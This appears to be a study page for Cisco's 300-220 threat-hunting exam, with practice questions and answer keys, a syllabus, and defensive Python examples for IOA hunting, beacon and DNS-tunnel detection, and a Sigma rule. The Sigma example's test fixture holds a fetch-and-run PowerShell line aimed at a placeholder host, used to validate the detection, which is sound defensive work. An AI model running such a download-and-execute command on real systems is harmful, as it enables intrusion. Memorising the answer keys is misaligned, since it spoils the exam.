100+ Free Cisco 300-220 CBRTHD Practice Questions

Pass your Cisco CBRTHD: Conducting Threat Hunting and Defending using Cisco Technologies (300-220) exam on the first try — instant access, no signup required.


Key Facts: Cisco 300-220 CBRTHD Exam

  • Exam questions: ~60
  • Exam duration: 90 min
  • Approximate cut score: ~825/1000 (Cisco scaled scoring)
  • Exam fee: $300 (Cisco / Pearson VUE)
  • Level: Professional (CyberOps concentration, Cisco CyberOps Professional track)
  • Certification validity: 3 years (Cisco recertification cycle)

The Cisco 300-220 CBRTHD exam has approximately 60 questions in 90 minutes with a scaled cut score commonly cited around 825/1000. Domains: threat hunting concepts and frameworks (20%), threat modeling techniques (20%), threat actor attribution (15%), threat hunting techniques (25%), threat hunting process (10%), threat hunting outcomes (10%). It is a CyberOps Professional concentration exam — passing it plus 350-201 CBRCOR earns the Cisco CyberOps Professional certification and the Cisco Certified Specialist - Threat Hunting badge. Exam fee is $300 USD at Pearson VUE.

Sample Cisco 300-220 CBRTHD Practice Questions

Try these sample questions to test your Cisco 300-220 CBRTHD exam readiness. Each question includes a detailed explanation. Start the interactive quiz above for the full 100+ question experience with AI tutoring.

1. Which definition best describes proactive threat hunting compared to traditional reactive incident response?
A. Threat hunting waits for SIEM alerts before any analyst action is taken on hosts
B. Threat hunting assumes adversaries are already inside the environment and searches for evidence in the absence of any alert
C. Threat hunting is the same as automated detection rule tuning in the SOC
D. Threat hunting only runs after an incident has been declared and contained
Explanation: B. Threat hunting is hypothesis-driven and assumes the adversary may already have bypassed perimeter and detection controls. Hunters proactively search telemetry (EDR, NetFlow, DNS, identity) for evidence that no alert has yet flagged, then convert findings into new detections.

2. In the OODA loop applied to threat hunting, which step involves comparing current telemetry against the hunter's mental model of the adversary's expected behavior?
A. Observe
B. Orient
C. Decide
D. Act
Explanation: B. Orient is where the hunter contextualizes raw observations against intel, prior incidents, and known TTPs to form an interpretation. Observe gathers telemetry; Decide chooses the next pivot; Act executes the query, containment, or escalation.

3. On David Bianco's Pyramid of Pain, which indicator type causes the MOST pain to an adversary when defenders detect and block it?
A. Hash values
B. IP addresses
C. Domain names
D. Tactics, Techniques, and Procedures (TTPs)
Explanation: D. TTPs sit at the top of the Pyramid of Pain. Adversaries can rotate hashes, IPs, and domains cheaply, but changing techniques requires retraining and re-tooling, which is costly and slow.

4. Which level of the Hunting Maturity Model (HMM) describes an organization that performs ad-hoc, analyst-driven hunts but lacks routine data collection or repeatable procedures?
A. HMM 0 — Initial
B. HMM 1 — Minimal
C. HMM 2 — Procedural
D. HMM 4 — Leading
Explanation: B. HMM 1 organizations consume threat intel and run ad-hoc hunts but have not codified procedures. HMM 0 relies entirely on automated alerting and does no hunting; HMM 2 follows procedures published by others; HMM 3 (Innovative, not listed) creates its own procedures; HMM 4 automates successful hunts and contributes intel back.

5. Which framework provides a structured, intelligence-driven methodology for the threat hunting lifecycle (Initiate, Hunt, Finalize)?
A. TaHiTI
B. PCI-DSS
C. SOC 2 Type II
D. FedRAMP Moderate
Explanation: A. TaHiTI (Targeted Hunting integrating Threat Intelligence) is a methodology published by the Dutch financial sector's FI-ISAC that defines three phases, Initiate, Hunt and Finalize, around hypothesis-driven, intel-informed hunts. The other options are compliance frameworks, not hunting methodologies.

6. Which MITRE ATT&CK matrix component represents the adversary's high-level goal, such as Initial Access or Lateral Movement?
A. Tactic
B. Technique
C. Sub-technique
D. Procedure
Explanation: A. Tactics describe WHY an adversary acts (the goal). Techniques describe HOW. Sub-techniques are more specific implementations. Procedures are the actual observed steps used by a threat actor.

7. MITRE ATT&CK Navigator is most commonly used by hunt teams to:
A. Automatically remediate compromised endpoints
B. Build colored heatmap layers to visualize coverage, gaps, and threat actor overlap across techniques
C. Replace the SIEM as the primary alerting console
D. Issue digital certificates for endpoint authentication
Explanation: B. ATT&CK Navigator is a free MITRE web tool for annotating and visualizing the ATT&CK matrix as colored layers. Teams use it to map detection coverage, overlay threat-group TTPs, and find detection gaps.

8. MITRE D3FEND complements ATT&CK by providing a knowledge graph of:
A. Adversary tradecraft only
B. Defensive countermeasures mapped to ATT&CK techniques
C. Vulnerability scoring metrics
D. Penetration testing payloads
Explanation: B. D3FEND is MITRE's complementary knowledge graph of defensive techniques, grouped under the tactics Model, Harden, Detect, Isolate, Deceive and Evict, and mapped to the ATT&CK techniques they counter.

9. What is the PRIMARY difference between an Indicator of Compromise (IOC) and an Indicator of Attack (IOA)?
A. IOCs are only network-based; IOAs are only endpoint-based
B. IOCs identify post-compromise artifacts (hashes, IPs, domains); IOAs identify behaviors and intent regardless of specific artifacts
C. IOCs are always encrypted; IOAs are always plaintext
D. IOAs are deprecated and no longer used in modern SOCs
Explanation: B. IOCs are forensic artifacts that prove a compromise occurred (hashes, IPs, domains, registry keys). IOAs describe attacker behaviors and intent (e.g., process injection followed by credential dumping) and are more durable across infrastructure changes, because the adversary can swap artifacts far more cheaply than tradecraft.

10. A hunt that begins with a specific intel report stating "APT29 is using technique T1059.001 (PowerShell) for initial execution" is BEST classified as which type of hunt?
A. Unstructured (data-driven) hunt
B. Structured (hypothesis-driven) hunt
C. Situational (entity-driven) hunt
D. Exploratory hunt
Explanation: B. Structured hunts are explicitly hypothesis-driven and tied to a known TTP, IOA, or threat actor, exactly the case here (APT29 + T1059.001). Unstructured hunts start from anomalies in data; situational hunts focus on a critical asset or campaign.
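
As an added example of the IOC/IOA distinction in question 9 (this is not code from the page or from any Cisco product), the Python below runs a hash-based IOC hunt and a behaviour-based IOA hunt over the same constructed endpoint telemetry. The events, the placeholder hashes and the trusted-path allowlist are all assumptions made up for the example. The point it shows: when the adversary recompiles the sample, the IOC hunt goes blind, while the IOA hunt, which keys on "process launched from a user-writable path then opens LSASS", still fires, and false-positive tuning happens in the allowlist rather than by loosening the behaviour.

```python
"""IOC hunt vs IOA hunt over the same endpoint telemetry.

Added example, not code from the page or from any Cisco product. The events
are constructed Sysmon-style records (ProcessCreate / ProcessAccess), the
hashes are placeholders, and the trusted-path allowlist is hypothetical.
"""

LSASS = r"c:\windows\system32\lsass.exe"
# Paths an unprivileged user can write to: a fresh binary here touching LSASS is suspicious.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Hypothetical allowlist for false-positive tuning (e.g. an AV engine that legitimately reads LSASS).
TRUSTED_PREFIXES = ("c:\\program files\\av\\",)

# Constructed IOC feed: SHA-256 of one known-bad sample (placeholder value).
IOC_HASHES = {"a" * 64}

# Constructed telemetry, ts in seconds. Host ws02 runs the *same tradecraft*
# recompiled, so its hash ("b" * 64) is not in the feed.
EVENTS = [
    {"ts": 1, "host": "ws01", "event": "process_create", "pid": 100,
     "image": r"C:\Users\alice\AppData\Local\Temp\loader.exe", "sha256": "a" * 64, "target": None},
    {"ts": 2, "host": "ws01", "event": "process_access", "pid": 100,
     "image": r"C:\Users\alice\AppData\Local\Temp\loader.exe", "sha256": "a" * 64,
     "target": r"C:\Windows\System32\lsass.exe"},
    {"ts": 10, "host": "ws02", "event": "process_create", "pid": 200,
     "image": r"C:\ProgramData\svc.exe", "sha256": "b" * 64, "target": None},
    {"ts": 11, "host": "ws02", "event": "process_access", "pid": 200,
     "image": r"C:\ProgramData\svc.exe", "sha256": "b" * 64,
     "target": r"C:\Windows\System32\lsass.exe"},
    {"ts": 20, "host": "ws03", "event": "process_create", "pid": 300,
     "image": r"C:\Program Files\AV\avscan.exe", "sha256": "c" * 64, "target": None},
    {"ts": 21, "host": "ws03", "event": "process_access", "pid": 300,
     "image": r"C:\Program Files\AV\avscan.exe", "sha256": "c" * 64,
     "target": r"C:\Windows\System32\lsass.exe"},
]


def match_iocs(events, ioc_hashes):
    """IOC hunt: exact artifact match. Returns {(host, pid)}; misses the recompiled sample."""
    return {(e["host"], e["pid"]) for e in events if e["sha256"] in ioc_hashes}


def match_ioa_lsass_access(events, window_s=60):
    """IOA hunt: a process started from a user-writable path opens LSASS shortly after launch.

    Behaviour-based, so it survives a hash change. The trusted-prefix check is
    where false-positive tuning happens instead of weakening the behaviour.
    """
    started = {}  # (host, pid) -> (image, ts) from the ProcessCreate event
    hits = set()
    for e in sorted(events, key=lambda x: x["ts"]):
        key = (e["host"], e["pid"])
        image = e["image"].lower()
        if e["event"] == "process_create":
            started[key] = (image, e["ts"])
        elif e["event"] == "process_access" and (e["target"] or "").lower() == LSASS:
            if image.startswith(TRUSTED_PREFIXES):
                continue  # allowlisted reader of LSASS
            if (key in started and e["ts"] - started[key][1] <= window_s
                    and image.startswith(USER_WRITABLE)):
                hits.add(key)
    return hits


if __name__ == "__main__":
    print("IOC hits:", sorted(match_iocs(EVENTS, IOC_HASHES)))   # ws01 only
    print("IOA hits:", sorted(match_ioa_lsass_access(EVENTS)))  # ws01 and ws02
```

The IOA hit on ws02 is exactly the kind of finding the hunt loop turns into a new detection: the behaviour becomes a rule, and the fresh hash from ws02 is pushed back to the IOC feed as a cheap secondary signal.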

About the Cisco 300-220 CBRTHD Exam

Cisco 300-220 CBRTHD (Conducting Threat Hunting and Defending using Cisco Technologies) is a CyberOps Professional concentration exam. It validates a hunter's ability to apply threat hunting frameworks (MITRE ATT&CK, D3FEND, TaHiTI, HMM, Pyramid of Pain, Diamond Model, Cyber Kill Chain), interpret threat intelligence (STIX/TAXII, Cisco Talos), use Cisco Secure data sources (Secure Endpoint, Stealthwatch with ETA, Secure Firewall FTD, Umbrella, ESA, WSA, ISE, Duo, Secure Workload), operate hunting tooling (Cisco XDR, SecureX orchestration, Secure Malware Analytics, Splunk Cisco apps, ELK), execute endpoint and network hunts, hand off to NIST IR, and convert findings into durable detections.

  • Questions: ~60
  • Time limit: 90 minutes
  • Passing score: variable cut score (~825/1000)
  • Exam fee: $300 (Cisco / Pearson VUE)

Cisco 300-220 CBRTHD Exam Content Outline

Threat Hunting Concepts and Frameworks (20%)

Proactive vs reactive defense, the hunt loop and OODA, structured/unstructured/situational hunts, Pyramid of Pain (IOC vs IOA), MITRE ATT&CK (tactics/techniques/sub-techniques/procedures), ATT&CK Navigator, MITRE D3FEND, TaHiTI methodology, and the Hunting Maturity Model (HMM)

Threat Modeling Techniques (20%)

Diamond Model of Intrusion Analysis (Adversary, Capability, Infrastructure, Victim and pivots), Lockheed Martin Cyber Kill Chain (Recon -> Weaponize -> Deliver -> Exploit -> Install -> C2 -> Actions on Objectives), STIX/TAXII threat intel sharing, and Cisco Talos as the integrated intel feed

Threat Actor Attribution Techniques (15%)

APT profiling: targeted sectors and geography, TTPs mapped to ATT&CK, malware families and tooling overlap, infrastructure clustering, attribution caveats and confidence levels

Threat Hunting Techniques: Endpoint, Network, Cisco Data Sources (25%)

Endpoint hunts: process injection (T1055), persistence (registry Run keys, scheduled tasks, WMI), Pass-the-Hash, Golden Ticket, Kerberoasting, DCSync, LOLBins (mshta, certutil, bitsadmin), fileless malware, PowerShell encoded execution, LSASS access (T1003.001). Network hunts: beaconing, DNS tunneling, DGA, fast flux, encrypted C2 fingerprints (JA3/JA3S), data exfiltration, anomalous protocols, and Stealthwatch alarms. Cisco data sources: Secure Endpoint (process/file/network telemetry, Orbital, Trajectory), Secure Network Analytics (Stealthwatch) with NetFlow + ETA, Secure Firewall FTD/FMC, Umbrella DNS + Investigate, Secure Email (ESA), Secure Web (WSA), ISE/TrustSec, Duo, Secure Workload
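
Two of the network hunts listed above, beaconing and DNS tunneling, as an added example in Python that is not code from the page or from Secure Network Analytics or Umbrella. The flow records and query names are constructed, and the thresholds are illustrative starting points to tune against your own baseline rather than product defaults. The beacon check measures how regular the inter-flow intervals to a peer are (timer-driven implants stay regular even with sleep jitter; human browsing does not), and the tunneling check flags query names whose leftmost label is long and high-entropy, i.e. encoded data rather than a hostname.

```python
"""Network hunt heuristics over constructed telemetry: C2 beaconing in flow
records and DNS-tunneling-like query names.

Added example, not from the page or from any Cisco product. Flow records and
DNS names are constructed; thresholds are starting points, not product defaults.
"""
from collections import Counter, defaultdict
from math import log2
from statistics import mean, pstdev

# Constructed NetFlow-like records: (ts_seconds, src, dst, dport).
FLOWS = (
    # 10.1.1.5 -> 203.0.113.10:443 every ~60 s with a few seconds of jitter (beacon).
    [(t, "10.1.1.5", "203.0.113.10", 443) for t in (0, 61, 119, 181, 240, 299, 361, 420, 480)]
    # Same host browsing 198.51.100.7:443 in bursts (human-driven, irregular).
    + [(t, "10.1.1.5", "198.51.100.7", 443) for t in (0, 5, 7, 40, 41, 300, 302, 350, 900)]
    # Too few flows to judge.
    + [(t, "10.1.1.9", "203.0.113.10", 443) for t in (0, 60, 120)]
)


def beacon_candidates(flows, min_flows=8, max_cv=0.2):
    """Flag (src, dst, dport) peers whose inter-flow intervals are unusually regular.

    cv = stdev/mean of the intervals: near 0 for a timer-driven beacon, >1 for
    browsing. A uniform +/-10% sleep jitter gives cv ~0.06, so 0.2 still catches it.
    """
    by_peer = defaultdict(list)
    for ts, src, dst, dport in flows:
        by_peer[(src, dst, dport)].append(ts)
    out = {}
    for key, stamps in by_peer.items():
        if len(stamps) < min_flows:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        m = mean(gaps)
        cv = pstdev(gaps) / m if m else float("inf")
        if cv <= max_cv:
            out[key] = {"flows": len(stamps), "interval_s": m, "cv": round(cv, 3)}
    return out


def label_entropy(label):
    """Shannon entropy in bits per character of one DNS label."""
    n = len(label)
    if not n:
        return 0.0
    return -sum(c / n * log2(c / n) for c in Counter(label).values())


def tunnel_like(qname, min_label_len=30, min_entropy=3.5):
    """True when the leftmost label is long and high-entropy: encoded data, not a hostname."""
    first = qname.rstrip(".").split(".")[0]
    return len(first) >= min_label_len and label_entropy(first) >= min_entropy


if __name__ == "__main__":
    for peer, stats in beacon_candidates(FLOWS).items():
        print("beacon candidate:", peer, stats)
    # Constructed label: 32 hex chars with every digit exactly twice -> entropy 4.0 bits.
    for q in ("www.example.com", "3f9a1c7e0b5d2846a04e8c2b6f1d3957.t.example.net"):
        print(q, "tunnel-like" if tunnel_like(q) else "ok")
```

In practice the beacon score is combined with Stealthwatch-style context (new external peer, low byte-count variance, off-hours) before anyone pivots, and the entropy check is run per parent zone so that CDN and telemetry domains that legitimately use long random labels can be allowlisted once rather than per query.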

Threat Hunting Process and Tooling (10%)

Hypothesis development, scoping, data collection, investigation pivots, and documentation. Cisco XDR (extended detection and response), SecureX orchestration / XDR Automate, Cisco Threat Intelligence Director (TID) on FMC, Secure Malware Analytics (formerly ThreatGrid), Splunk Cisco Security apps and CIM add-ons, ELK stack

Threat Hunting Outcomes: Detection Engineering, IR, Metrics (10%)

Convert findings into versioned detections (Sigma, EDR, SIEM correlation), purple-team validation (Atomic Red Team, Caldera), NIST IR lifecycle handoff (Preparation -> Detection & Analysis -> Containment, Eradication, Recovery -> Post-Incident), playbooks, tabletops, MTTD/MTTR/dwell time, false positive tuning, and hunt report quality
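
One way to carry an endpoint finding from the techniques domain (encoded PowerShell execution, T1059.001) through the outcomes domain, as an added example that is not from the page, Cisco or the SigmaHQ rule set: the block holds the Sigma rule text you would commit to version control, evaluates the same detection logic over constructed Sysmon-style process_creation events (a true positive, a tuned-out false positive and a benign command), and decodes the -EncodedCommand payload for the hunt report. The ManagementConsole.exe parent filter and the UUID placeholder are assumptions; pySigma and PyYAML are deliberately not used so the block runs offline, which is why the detection section is mirrored as Python structures with Sigma's case-insensitive matching.

```python
"""From hunt finding to versioned detection: encoded PowerShell (ATT&CK T1059.001).

Added example, not from the page or from any Cisco or SigmaHQ rule. The YAML is
what goes in git; SELECTION/FILTER mirror its detection block so the rule can be
validated here without pySigma/PyYAML. Events are constructed Sysmon-style
process_creation records; ManagementConsole.exe is a hypothetical tuned-out parent.
"""
import base64
import re

SIGMA_RULE_YAML = """\
title: Encoded PowerShell Command Line
id: 00000000-0000-4000-8000-000000000000   # placeholder: generate a real UUID per rule
status: experimental
description: PowerShell launched with an encoded command; hunt finding promoted to a detection
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\\powershell.exe'
      - '\\pwsh.exe'
    CommandLine|contains:
      - ' -enc '
      - ' -encodedcommand '
      - ' -ec '
  filter_mgmt_console:
    ParentImage|endswith: '\\ManagementConsole.exe'
  condition: selection and not filter_mgmt_console
level: high
tags:
  - attack.execution
  - attack.t1059.001
"""

# The detection block above, mirrored for offline evaluation (Sigma matches case-insensitively).
SELECTION = {
    "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
    "CommandLine|contains": [" -enc ", " -encodedcommand ", " -ec "],
}
FILTER_MGMT_CONSOLE = {"ParentImage|endswith": ["\\ManagementConsole.exe"]}


def _field_matches(event, spec, values):
    """Evaluate one 'Field|modifier: [values]' line; list values are OR-ed, as in Sigma."""
    field, _, modifier = spec.partition("|")
    actual = str(event.get(field, "")).lower()
    vals = [v.lower() for v in values]
    if modifier == "endswith":
        return any(actual.endswith(v) for v in vals)
    if modifier == "startswith":
        return any(actual.startswith(v) for v in vals)
    if modifier == "contains":
        return any(v in actual for v in vals)
    return actual in vals  # no modifier: exact match


def _block_matches(event, block):
    """All fields inside one selection/filter map must match (AND)."""
    return all(_field_matches(event, spec, vals) for spec, vals in block.items())


def rule_matches(event):
    """condition: selection and not filter_mgmt_console"""
    return _block_matches(event, SELECTION) and not _block_matches(event, FILTER_MGMT_CONSOLE)


ENC_RE = re.compile(r"-(?:enc|encodedcommand|ec)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Recover the script from -EncodedCommand (base64 of UTF-16LE); None if absent."""
    m = ENC_RE.search(cmdline)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


# Constructed validation events (Atomic-style true positive, tuned-out parent, benign use).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = {
    "true_positive": {"Image": PS, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                      "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    "tuned_out": {"Image": PS, "ParentImage": r"C:\Program Files\Vendor\ManagementConsole.exe",
                  "CommandLine": f"powershell.exe -enc {ENCODED}"},
    "benign": {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
               "CommandLine": "powershell.exe -Command Get-Process"},
}


def run_validation(events=EVENTS):
    """Name -> did the rule fire; the purple-team check you run before merging the rule."""
    return {name: rule_matches(ev) for name, ev in events.items()}


if __name__ == "__main__":
    print(run_validation())  # true_positive only
    print(decode_encoded_command(EVENTS["true_positive"]["CommandLine"]))
```

The validation dictionary is what the pull request for the rule should show: the Atomic-style test fires, the documented exception does not, and the benign baseline stays quiet. Widening the filter is the false-positive-tuning knob; the selection itself stays tied to the behaviour.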

How to Pass the Cisco 300-220 CBRTHD Exam

What You Need to Know

  • Passing score: Variable cut score (~825/1000)
  • Exam length: 60 questions
  • Time limit: 90 minutes
  • Exam fee: $300

Keys to Passing

  • Complete 500+ practice questions
  • Score 80%+ consistently before scheduling
  • Focus on highest-weighted sections
  • Use our AI tutor for tough concepts

Cisco 300-220 CBRTHD Study Tips from Top Performers

1. Memorize the 14 MITRE ATT&CK enterprise tactics in order; the exam expects fluency
2. Hunt for TTPs (top of the Pyramid of Pain); they cause the adversary the most cost
3. Know the Cisco Secure product names AND former names (Secure Endpoint = AMP, Secure Network Analytics = Stealthwatch, Secure Malware Analytics = ThreatGrid, SecureX threat response = now Cisco XDR Investigate)
4. Practice mapping endpoint behaviors to specific ATT&CK techniques (T1055 process injection, T1059.001 PowerShell, T1003.001 LSASS, T1547.001 Run keys, T1053.005 scheduled tasks)
5. Stealthwatch ETA detects malware in TLS WITHOUT decryption; be ready to recognize this on the exam
6. Order of volatility for forensics: RAM and network state FIRST, then disk imaging, then offline artifacts
7. Hunt outcomes must produce durable detections: version-controlled Sigma/EDR rules, validated with Atomic Red Team or Caldera
8. Know the NIST IR lifecycle order: Preparation -> Detection & Analysis -> Containment, Eradication & Recovery -> Post-Incident Activity

Frequently Asked Questions

What is the Cisco 300-220 CBRTHD exam?

Cisco 300-220 CBRTHD (Conducting Threat Hunting and Defending using Cisco Technologies) is a CyberOps Professional concentration exam. It validates threat hunting expertise across frameworks (MITRE ATT&CK, D3FEND, TaHiTI, HMM, Pyramid of Pain, Diamond Model, Cyber Kill Chain), Cisco Secure data sources, and the hunt-to-detection lifecycle.

How many questions are on the 300-220 exam?

The Cisco 300-220 CBRTHD exam has approximately 55-65 questions delivered in 90 minutes. Question types include multiple choice (single and multiple response), drag-and-drop, and scenario-based items. Cisco does not publish the exact item count per form.

What is the passing score for Cisco 300-220?

Cisco does not publish an exact passing percentage for 300-220. Cisco professional exams are scored on a 300-1000 scale with the practical cut score commonly reported around 825/1000. Cisco may adjust cut scores between forms based on item difficulty.

How much does the Cisco 300-220 exam cost?

The Cisco 300-220 CBRTHD exam costs $300 USD at Pearson VUE. The exam can be taken at a physical Pearson VUE test center or online via OnVUE proctored delivery. Local pricing and tax may apply.

What certification does 300-220 earn?

Passing 300-220 alone earns the Cisco Certified Specialist - Threat Hunting badge. Combined with 350-201 CBRCOR (the CyberOps Professional core exam), it earns the full Cisco CyberOps Professional certification, valid for 3 years.

How long should I study for Cisco 300-220?

Plan for 80-160 hours of focused study over 2-4 months. Core resources: official Cisco CBRTHD exam topics, the Cisco CBRTHD course (or Cisco U. learning path), MITRE ATT&CK and D3FEND, hands-on labs with Cisco XDR, Secure Endpoint (Orbital), Stealthwatch ETA, Umbrella Investigate, and Secure Firewall FTD/FMC. Aim for 85%+ on full-length mocks before scheduling.